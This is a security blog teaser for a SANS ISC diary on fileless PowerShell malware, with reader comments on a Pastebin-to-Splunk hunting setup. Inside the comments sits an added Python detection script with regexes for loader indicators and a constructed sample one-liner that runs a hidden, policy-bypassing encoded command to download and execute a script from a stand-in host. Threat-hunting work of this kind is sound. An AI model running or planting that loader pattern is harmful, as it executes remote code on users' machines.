
[SANS ISC] Fileless Malicious PowerShell Sample

I published the following diary on isc.sans.org: “Fileless Malicious PowerShell Sample”:

Pastebin.com remains one of my favourite places for hunting. I’m searching for juicy content and reporting findings in a Splunk dashboard:

Yesterday, I found an interesting pastie with a simple Windows CMD script…

4 comments

  1. Hi Xavier

    Yes please – I will be awaiting aggressively on this article then 🙂

    /Torben

  2. Hi Torben,
    Thank you for the feedback. The initial script that I wrote in 2012 is not maintained anymore and was not efficient! I’m a bad programmer 🙂
    Today, I’m generating the dashboard with, as you found it, Paste2Splunk. It fetches pasties and sends the interesting ones directly to Splunk using the REST API.
    I should probably write an article about the setup…
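The pipeline described in the reply above (fetch pasties, keep the interesting ones, ship them to Splunk over its REST API) as an added example; this is not Paste2Splunk's or the diary's code. It scores a paste body against indicators typical of fileless PowerShell loaders, decodes an `-EncodedCommand` payload the way powershell.exe does (UTF-16LE), and builds a Splunk HTTP Event Collector (HEC) event. The indicator list and weights, the threshold, the `pastebin:hunt` sourcetype, and the HEC URL and token are assumptions; the two sample pastes are constructed inline.

```python
"""Score pastes for fileless-PowerShell indicators and build Splunk HEC events.

Added example, not Paste2Splunk or the ISC diary's own code. Indicators,
weights, threshold, sourcetype and the HEC endpoint/token are assumptions.
"""
import base64
import json
import re
import time
import urllib.request

# (name, pattern, weight): patterns seen in fileless PowerShell one-liners.
# Weights and the list itself are our own choice for this example.
INDICATORS = [
    ("encoded_command", re.compile(r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 5),
    ("from_base64", re.compile(r"FromBase64String", re.I), 3),
    ("invoke_expression", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 3),
    ("download", re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I), 2),
    ("hidden_window", re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), 2),
    ("policy_bypass", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 2),
    ("no_profile", re.compile(r"-nop\b|-noprofile\b", re.I), 1),
]

def score_paste(text):
    """Return (score, list of matched indicator names) for one paste body."""
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            score += weight
            hits.append(name)
    return score, hits

def decode_encoded_command(text):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE, as powershell.exe
    expects) so the analyst sees the clear-text script; None if absent/invalid."""
    m = re.search(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", text, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def build_hec_event(paste_id, text, threshold=5):
    """Build a Splunk HEC payload for a paste, or None if it scores below threshold."""
    score, hits = score_paste(text)
    if score < threshold:
        return None
    return {
        "time": int(time.time()),
        "sourcetype": "pastebin:hunt",  # assumed sourcetype name
        "event": {
            "paste_id": paste_id,
            "score": score,
            "indicators": hits,
            "decoded": decode_encoded_command(text),
            "raw": text[:2048],  # cap what gets indexed
        },
    }

def send_to_hec(event, url, token):
    """POST one event to Splunk HEC (/services/collector/event). URL and token
    are yours; HEC expects the 'Authorization: Splunk <token>' header."""
    req = urllib.request.Request(
        url,
        data=json.dumps(event).encode(),
        headers={"Authorization": "Splunk " + token, "Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)

# Constructed sample pastes: one benign admin snippet, one loader one-liner.
PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')".encode("utf-16-le")
).decode()
SAMPLE_PASTES = {
    "benign": "Get-ChildItem C:\\Users | Sort-Object LastWriteTime",
    "loader": "powershell.exe -nop -w hidden -ep bypass -enc " + PAYLOAD,
}

if __name__ == "__main__":
    for pid, body in SAMPLE_PASTES.items():
        ev = build_hec_event(pid, body)
        print(pid, "->", json.dumps(ev, indent=1) if ev else "below threshold, not sent")
    # send_to_hec(ev, "https://splunk.example.invalid:8088/services/collector/event", "<hec-token>")
```

Only pastes at or above the threshold become events, which keeps the Splunk index to hunting leads rather than every pastie fetched; the decoded payload is stored alongside the raw text so the dashboard can be searched on the clear-text command rather than its base64 form.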

  3. Hi Xavier

    As a regular reader of Internet Storm Center, this was another interesting post, so thanks for that and keep up the good work.

    I have a question about this post though, as you start it with this info: “Pastebin.com remains one of my favourite places for hunting. I’m searching for juicy content and reporting findings in a Splunk dashboard” – this sounds brilliant.

    I found out that back in 2012 you made a script called Pastemon, but I don’t think this will work “out of the box” anymore, as I can read that Pastebin has made some changes to how queries are sent (you need a Pro account now) – so is it your Paste2Splunk Python script that you are using today?

    So, installation-wise – do I git clone your Paste2Splunk package and then take the settings.conf from the PasterHunter package, drop it into your “Paste2Splunk” folder and disable the “Outputs” other than Syslog – or?

    As I’m new to Splunk, how is the dashboard that you show in the post set up – is there a guide on how you set this up, or is there a dashboard template that could be imported?

    Best Regards

    Torben
